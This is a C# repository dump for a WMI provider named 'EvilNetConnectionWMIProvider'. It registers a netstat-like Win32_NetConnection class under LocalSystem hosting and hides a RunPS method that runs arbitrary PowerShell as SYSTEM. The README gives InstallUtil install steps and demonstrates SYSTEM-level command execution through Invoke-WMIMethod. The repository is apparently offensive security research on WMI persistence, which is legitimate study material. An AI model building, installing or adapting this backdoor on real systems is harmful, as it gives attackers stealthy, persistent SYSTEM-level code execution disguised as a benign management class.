├── .gitattributes ├── .gitignore ├── EvilNetConnectionWMIProvider.sln ├── EvilNetConnectionWMIProvider ├── EvilNetConnectionWMIProvider.cs ├── EvilNetConnectionWMIProvider.csproj ├── Properties │ └── AssemblyInfo.cs ├── bin │ └── Debug │ │ ├── EvilNetConnectionWMIProvider.dll │ │ └── InstallUtil.exe └── key.snk └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.sln.docstates 8 | 9 | # Build results 10 | 11 | [Rr]elease/ 12 | x64/ 13 | build/ 14 | [Oo]bj/ 15 | 16 | # Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets 17 | !packages/*/build/ 18 | 19 | # MSTest test Results 20 | [Tt]est[Rr]esult*/ 21 | [Bb]uild[Ll]og.* 22 | 23 | *_i.c 24 | *_p.c 25 | *.ilk 26 | *.meta 27 | *.obj 28 | *.pch 29 | *.pdb 30 | *.pgc 31 | *.pgd 32 | *.rsp 33 | *.sbr 34 | *.tlb 35 | *.tli 36 | *.tlh 37 | *.tmp 38 | *.tmp_proj 39 | *.log 40 | *.vspscc 41 | *.vssscc 42 | .builds 43 | *.pidb 44 | *.log 45 | *.scc 46 | 47 | # Visual C++ cache files 48 | ipch/ 49 | *.aps 50 | *.ncb 51 | *.opensdf 52 | *.sdf 53 | *.cachefile 54 | 55 | # Visual Studio profiler 56 | *.psess 57 | *.vsp 58 | *.vspx 59 | 60 | # Guidance Automation Toolkit 61 | *.gpState 62 | 63 | # ReSharper is a .NET coding add-in 64 | _ReSharper*/ 65 | *.[Rr]e[Ss]harper 66 | 67 | # TeamCity is a build add-in 68 | _TeamCity* 69 | 70 | # DotCover is a Code Coverage Tool 71 | *.dotCover 72 | 73 | # NCrunch 74 | *.ncrunch* 75 | .*crunch*.local.xml 76 | 77 | # Installshield output folder 78 | [Ee]xpress/ 79 | 80 | # DocProject is a documentation generator add-in 81 | DocProject/buildhelp/ 82 | DocProject/Help/*.HxT 83 | DocProject/Help/*.HxC 84 | DocProject/Help/*.hhc 85 | DocProject/Help/*.hhk 86 | DocProject/Help/*.hhp 87 | DocProject/Help/Html2 88 | DocProject/Help/html 89 | 90 | # Click-Once directory 91 | publish/ 92 | 93 | # Publish Web Output 94 | *.Publish.xml 95 | 96 | # NuGet Packages Directory 97 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 98 | #packages/ 99 | 100 | # Windows Azure Build Output 101 | csx 102 | *.build.csdef 103 | 104 | # Windows Store app package directory 105 | AppPackages/ 106 | 107 | # Others 108 | sql/ 109 | *.Cache 110 | ClientBin/ 111 | [Ss]tyle[Cc]op.* 112 | ~$* 113 | *~ 114 | *.dbmdl 115 | *.[Pp]ublish.xml 116 | *.pfx 117 | *.publishsettings 118 | 119 | # RIA/Silverlight projects 120 | Generated_Code/ 121 | 122 | # Backup & report files from converting an old project file to a newer 123 | # Visual Studio version. Backup files are not needed, because we have git ;-) 124 | _UpgradeReport_Files/ 125 | Backup*/ 126 | UpgradeLog*.XML 127 | UpgradeLog*.htm 128 | 129 | # SQL Server files 130 | App_Data/*.mdf 131 | App_Data/*.ldf 132 | 133 | 134 | #LightSwitch generated files 135 | GeneratedArtifacts/ 136 | _Pvt_Extensions/ 137 | ModelManifest.xml 138 | 139 | # ========================= 140 | # Windows detritus 141 | # ========================= 142 | 143 | # Windows image file caches 144 | Thumbs.db 145 | ehthumbs.db 146 | 147 | # Folder config file 148 | Desktop.ini 149 | 150 | # Recycle Bin used on file shares 151 | $RECYCLE.BIN/ 152 | 153 | # Mac desktop service store files 154 | .DS_Store 155 | -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.30501.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "EvilNetConnectionWMIProvider", "EvilNetConnectionWMIProvider\EvilNetConnectionWMIProvider.csproj", "{ECE97EF2-F443-4294-A952-01E36E2077D2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {ECE97EF2-F443-4294-A952-01E36E2077D2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {ECE97EF2-F443-4294-A952-01E36E2077D2}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {ECE97EF2-F443-4294-A952-01E36E2077D2}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {ECE97EF2-F443-4294-A952-01E36E2077D2}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/EvilNetConnectionWMIProvider.cs: -------------------------------------------------------------------------------- 1 | // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx 2 | // RunPs Method is adapted from @sixdub's PowerPick project https://github.com/Veil-Framework/PowerTools/tree/master/PowerPick 3 | 4 | // Instructions 5 | // 1) cd into bin/Debug 6 | // 2) InstallUtil.exe /i EvilNetConnectionWMIProvider.dll 7 | 8 | using System; 9 | using System.Text; 10 | using System.Collections; 11 | 12 | // Add libraries for Network Connections 13 | using System.Net; 14 | using System.Net.NetworkInformation; 15 | 16 | // Add libraries for WMI Provider 17 | using System.Management; 18 | using System.Management.Instrumentation; 19 | using System.Configuration.Install; 20 | 21 | // Adding libraries for PowerShell Stuff 22 | using System.Collections.ObjectModel; 23 | using System.Management.Automation; 24 | using System.Management.Automation.Runspaces; 25 | 26 | [assembly: WmiConfiguration(@"root\cimv2", HostingModel = ManagementHostingModel.LocalSystem)] 27 | namespace NetConnectionWMIProvider 28 | { 29 | [System.ComponentModel.RunInstaller(true)] 30 | public class MyInstall : DefaultManagementInstaller 31 | { 32 | public override void Install(IDictionary stateSaver) 33 | { 34 | //This effectively does what gacutil does. 35 | new System.EnterpriseServices.Internal.Publish().GacInstall("EvilNetConnectionWMIProvider.dll"); 36 | 37 | base.Install(stateSaver); 38 | System.Runtime.InteropServices.RegistrationServices RS = new System.Runtime.InteropServices.RegistrationServices(); 39 | } 40 | 41 | public override void Uninstall(IDictionary savedState) 42 | { 43 | 44 | try 45 | { 46 | new System.EnterpriseServices.Internal.Publish().GacRemove("EvilNetConnectionWMIProvider.dll"); 47 | 48 | ManagementClass MC = new ManagementClass(@"root\cimv2:Win32_NetConnection"); 49 | MC.Delete(); 50 | } 51 | catch { } 52 | 53 | try 54 | { 55 | base.Uninstall(savedState); 56 | } 57 | catch { } 58 | } 59 | } 60 | 61 | [ManagementEntity(Name = "Win32_NetConnection")] 62 | public class NetConnection 63 | { 64 | [ManagementKey] 65 | public string RemoteAddress { get; set; } 66 | [ManagementProbe] 67 | public int RemotePort { get; set; } 68 | [ManagementProbe] 69 | public string LocalAddress { get; set; } 70 | [ManagementProbe] 71 | public int LocalPort { get; set; } 72 | [ManagementProbe] 73 | public string State { get; set; } 74 | [ManagementProbe] 75 | public string Protocol { get; set; } 76 | 77 | 78 | public NetConnection(TcpConnectionInformation tcp) 79 | { 80 | Protocol = "TCP"; 81 | RemoteAddress = tcp.RemoteEndPoint.Address.ToString(); 82 | RemotePort = tcp.RemoteEndPoint.Port; 83 | LocalAddress = tcp.LocalEndPoint.Address.ToString(); 84 | LocalPort = tcp.LocalEndPoint.Port; 85 | State = tcp.State.ToString(); 86 | } 87 | public NetConnection(IPEndPoint ep, string protocol) 88 | { 89 | Protocol = protocol; 90 | LocalAddress = ep.Address.ToString(); 91 | LocalPort = ep.Port; 92 | State = "LISTENING"; 93 | } 94 | 95 | 96 | [ManagementEnumerator] 97 | static public IEnumerable GetTCPConnections() 98 | { 99 | 100 | foreach (TcpConnectionInformation tcp in IPGlobalProperties.GetIPGlobalProperties().GetActiveTcpConnections()) 101 | { 102 | yield return new NetConnection(tcp); 103 | } 104 | foreach (IPEndPoint ep in IPGlobalProperties.GetIPGlobalProperties().GetActiveTcpListeners()) 105 | { 106 | yield return new NetConnection(ep, "TCP"); 107 | } 108 | foreach (IPEndPoint ep in IPGlobalProperties.GetIPGlobalProperties().GetActiveUdpListeners()) 109 | { 110 | yield return new NetConnection(ep, "UDP"); 111 | } 112 | } 113 | 114 | [ManagementTask] 115 | public static string RunPS(string cmd) 116 | { 117 | //Init stuff 118 | Runspace runspace = RunspaceFactory.CreateRunspace(); 119 | runspace.Open(); 120 | RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); 121 | Pipeline pipeline = runspace.CreatePipeline(); 122 | 123 | //Add commands 124 | pipeline.Commands.AddScript(cmd); 125 | 126 | //Prep PS for string output and invoke 127 | pipeline.Commands.Add("Out-String"); 128 | Collection results = pipeline.Invoke(); 129 | runspace.Close(); 130 | 131 | //Convert records to strings 132 | StringBuilder stringBuilder = new StringBuilder(); 133 | foreach (PSObject obj in results) 134 | { 135 | stringBuilder.Append(obj); 136 | } 137 | return stringBuilder.ToString().Trim(); 138 | } 139 | } 140 | } -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/EvilNetConnectionWMIProvider.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {ECE97EF2-F443-4294-A952-01E36E2077D2} 8 | Library 9 | Properties 10 | EvilNetConnectionWMIProvider 11 | EvilNetConnectionWMIProvider 12 | v3.5 13 | 512 14 | 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | pdbonly 27 | true 28 | bin\Release\ 29 | TRACE 30 | prompt 31 | 4 32 | 33 | 34 | true 35 | 36 | 37 | key.snk 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | False 47 | ..\..\..\..\..\..\..\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | Component 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 70 | -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("EvilNetConnectionWMIProvider")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("EvilNetConnectionWMIProvider")] 13 | [assembly: AssemblyCopyright("Copyright © 2015")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("f8163c43-bf31-4343-bf78-88f10022eb22")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/bin/Debug/EvilNetConnectionWMIProvider.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jaredcatkinson/EvilNetConnectionWMIProvider/4b17eddc22bbb0e9acb2e894096ff8ff34aefa19/EvilNetConnectionWMIProvider/bin/Debug/EvilNetConnectionWMIProvider.dll -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/bin/Debug/InstallUtil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jaredcatkinson/EvilNetConnectionWMIProvider/4b17eddc22bbb0e9acb2e894096ff8ff34aefa19/EvilNetConnectionWMIProvider/bin/Debug/InstallUtil.exe -------------------------------------------------------------------------------- /EvilNetConnectionWMIProvider/key.snk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jaredcatkinson/EvilNetConnectionWMIProvider/4b17eddc22bbb0e9acb2e894096ff8ff34aefa19/EvilNetConnectionWMIProvider/key.snk -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Evil Network Connection WMI Provider 2 | - Returns Netstat like Information when queried 3 | - Contains a RunPs Method that executes arbitrary PowerShell as System 4 | 5 | ## Install Provider: 6 | ``` 7 | - Download and unzip project 8 | - Open administrator prompt 9 | - cd to directory containing EvilNetConnectionWMIProvider.dll 10 | 11 | PS C:\Windows\system32> cd \EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug 12 | PS \EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug> InstallUtil.exe /i EvilNetConnectionWMIProvider.dll 13 | ``` 14 | 15 | ## Uninstall Provider 16 | ``` 17 | PS C:\Windows\system32> cd \EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug 18 | PS \EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug> Uninstall "InstallUtil.exe /u EvilNetConnectionWMIProvider.dll" 19 | ``` 20 | 21 | ## Query Network Connections (netstat functionality): 22 | ``` 23 | PS C:\Windows\system32> Get-WMIObject Win32_NetConnection | select LocalAddress, LocalPort, RemoteAddress, RemotePort, Protocol, State | ft -AutoSize 24 | 25 | LocalAddress LocalPort RemoteAddress RemotePort Protocol State 26 | ------------ --------- ------------- ---------- -------- ----- 27 | 127.0.0.1 3369 127.0.0.1 19872 TCP Established 28 | 127.0.0.1 3374 127.0.0.1 3375 TCP Established 29 | 127.0.0.1 3375 127.0.0.1 3374 TCP Established 30 | 127.0.0.1 19872 127.0.0.1 3369 TCP Established 31 | 192.168.1.18 14040 65.52.0.51 5671 TCP Established 32 | 192.168.1.18 14047 192.30.252.91 443 TCP Established 33 | 192.168.1.18 14061 157.56.100.57 443 TCP Established 34 | 192.168.1.18 14091 65.52.0.51 5671 TCP Established 35 | 192.168.1.18 14099 54.230.49.116 443 TCP CloseWait 36 | 192.168.1.18 14141 108.160.170.35 443 TCP Established 37 | 0.0.0.0 135 0 TCP LISTENING 38 | 0.0.0.0 445 0 TCP LISTENING 39 | 0.0.0.0 1025 0 TCP LISTENING 40 | 0.0.0.0 1026 0 TCP LISTENING 41 | 0.0.0.0 1027 0 TCP LISTENING 42 | 0.0.0.0 1028 0 TCP LISTENING 43 | 0.0.0.0 1029 0 TCP LISTENING 44 | 0.0.0.0 1030 0 TCP LISTENING 45 | 0.0.0.0 5357 0 TCP LISTENING 46 | 0.0.0.0 17500 0 TCP LISTENING 47 | 0.0.0.0 47001 0 TCP LISTENING 48 | 127.0.0.1 2738 0 TCP LISTENING 49 | 127.0.0.1 5860 0 TCP LISTENING 50 | 127.0.0.1 5861 0 TCP LISTENING 51 | 127.0.0.1 13838 0 TCP LISTENING 52 | 127.0.0.1 14092 0 TCP LISTENING 53 | 127.0.0.1 14093 0 TCP LISTENING 54 | 127.0.0.1 17600 0 TCP LISTENING 55 | 127.0.0.1 17603 0 TCP LISTENING 56 | 192.168.1.18 139 0 TCP LISTENING 57 | 0.0.0.0 3702 0 UDP LISTENING 58 | 0.0.0.0 3702 0 UDP LISTENING 59 | 0.0.0.0 5355 0 UDP LISTENING 60 | 0.0.0.0 17500 0 UDP LISTENING 61 | 0.0.0.0 54056 0 UDP LISTENING 62 | 127.0.0.1 1900 0 UDP LISTENING 63 | 127.0.0.1 54806 0 UDP LISTENING 64 | 192.168.1.18 137 0 UDP LISTENING 65 | 192.168.1.18 138 0 UDP LISTENING 66 | 192.168.1.18 1900 0 UDP LISTENING 67 | ``` 68 | 69 | ## Execute Arbitrary PowerShell As SYSTEM 70 | ``` 71 | PS C:\Windows\system32> Invoke-WMIMethod -Class Win32_NetConnection -Name RunPs -ArgumentList "whoami", $NULL 72 | 73 | __GENUS : 2 74 | __CLASS : __PARAMETERS 75 | __SUPERCLASS : 76 | __DYNASTY : __PARAMETERS 77 | __RELPATH : 78 | __PROPERTY_COUNT : 1 79 | __DERIVATION : {} 80 | __SERVER : 81 | __NAMESPACE : 82 | __PATH : 83 | ReturnValue : nt authority\system 84 | PSComputerName : 85 | ``` 86 | 87 | ``` 88 | PS C:\Windows\system32> Invoke-WMIMethod -Class Win32_NetConnection -Name RunPs -ArgumentList "Get-Process", $NULL 89 | 90 | __GENUS : 2 91 | __CLASS : __PARAMETERS 92 | __SUPERCLASS : 93 | __DYNASTY : __PARAMETERS 94 | __RELPATH : 95 | __PROPERTY_COUNT : 1 96 | __DERIVATION : {} 97 | __SERVER : 98 | __NAMESPACE : 99 | __PATH : 100 | ReturnValue : Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName 101 | ------- ------ ----- ----- ----- ------ -- ----------- 102 | 134 5 5372 7468 32 8800 audiodg 103 | 115 6 4664 14344 90 0.31 2272 conhost 104 | 44 3 560 204 36 0.02 2292 conhost 105 | 443 7 1724 1336 38 376 csrss 106 | 396 10 1460 2268 44 440 csrss 107 | 131 5 2192 1924 32 0.58 6216 dasHost 108 | 1363 76 226680 291744 733 107.95 1528 devenv 109 | 1440 83 299828 200472 809 512.25 9488 devenv 110 | 1302 58 123884 18076 328 64.78 6360 Dropbox 111 | 247 17 143460 30888 297 613.95 732 dwm 112 | 3701 120 138920 52632 745 302.63 2476 explorer 113 | 157 7 1928 2704 82 0.09 4056 FlashUtil_ActiveX 114 | 1008 61 180364 149852 574 1,464.61 2212 GitHub 115 | 0 0 0 28 0 0 Idle 116 | 640 22 11464 19852 167 4.64 152 iexplore 117 | 552 15 14916 4516 225 7.50 160 iexplore 118 | 555 16 7056 4212 136 3.06 2732 iexplore 119 | 701 35 62184 53052 303 15.09 9164 iexplore 120 | 191 8 6580 1840 103 2.16 1436 IpOverUsbSvc 121 | 1214 13 5376 5888 40 72.03 544 lsass 122 | 450 19 53092 12008 281 64.69 6180 Microsoft.Alm.Share... 123 | 368 18 53924 70952 278 8.38 7172 Microsoft.Alm.Share... 124 | 158 7 2048 452 31 1.69 2940 msdtc 125 | 514 43 87432 27192 251 1680 MsMpEng 126 | 248 6 4060 788 37 2600 NisSrv 127 | 516 14 36268 43568 214 0.81 7484 powershell 128 | 94 4 932 1904 35 0.06 10128 RuntimeBroker 129 | 103 4 768 3652 25 0.00 4900 SearchFilterHost 130 | 705 39 38756 20740 162 58.95 3084 SearchIndexer 131 | 301 6 1340 5696 74 0.02 8416 SearchProtocolHost 132 | 238 5 2724 3040 23 536 services 133 | 1134 63 19584 3052 217 2.34 1816 SettingSyncHost 134 | 44 1 192 192 3 264 smss 135 | 423 14 4040 3568 64 5.73 1268 spoolsv 136 | 99 5 1060 1060 30 1.45 1548 sqlwriter 137 | 72 4 1608 852 283 0.09 4376 ssh-agent 138 | 417 9 3752 4416 41 27.20 600 svchost 139 | 1507 59 32856 14868 135 27.72 628 svchost 140 | 900 16 24220 19928 85 41.34 820 svchost 141 | 2350 30 19508 20820 143 322.63 860 svchost 142 | 583 21 8572 8560 86 25.80 908 svchost 143 | 623 12 13668 10708 71 223.61 972 svchost 144 | 1027 24 10868 10704 132 45.08 1080 svchost 145 | 482 28 13796 12660 70 39.30 1304 svchost 146 | 146 6 1792 1836 32 2.47 1564 svchost 147 | 226 11 9280 13088 90 2236 svchost 148 | 360 13 3888 4380 58 6.00 2776 svchost 149 | 885 0 40 568 3 4 System 150 | 277 8 2000 2956 74 85.47 2228 TabTip 151 | 234 8 2416 2276 72 0.63 2976 taskhost 152 | 314 18 5840 6420 98 8.19 2392 taskhostex 153 | 95 4 1508 4724 23 0.14 8636 taskhostex 154 | 144 7 9096 9900 100 86.03 2284 TPAutoConnect 155 | 152 6 1744 1412 52 9.28 1884 TPAutoConnSvc 156 | 66 3 720 384 37 1.56 752 vmacthlp 157 | 339 12 6244 6480 82 107.58 1588 vmtoolsd 158 | 419 17 15884 11036 163 223.20 3828 vmtoolsd 159 | 108 4 1012 920 25 0.16 9648 VsEtwService 160 | 76 5 720 192 34 0.09 468 wininit 161 | 160 5 1080 1328 45 2.22 476 winlogon 162 | 252 12 35728 31344 159 0.33 9528 WmiPrvSE 163 | 463 9 2504 1728 62 0.36 372 WUDFHost 164 | 436 6 1500 1156 37 0.64 1584 WUDFHost 165 | PSComputerName : 166 | ``` 167 | --------------------------------------------------------------------------------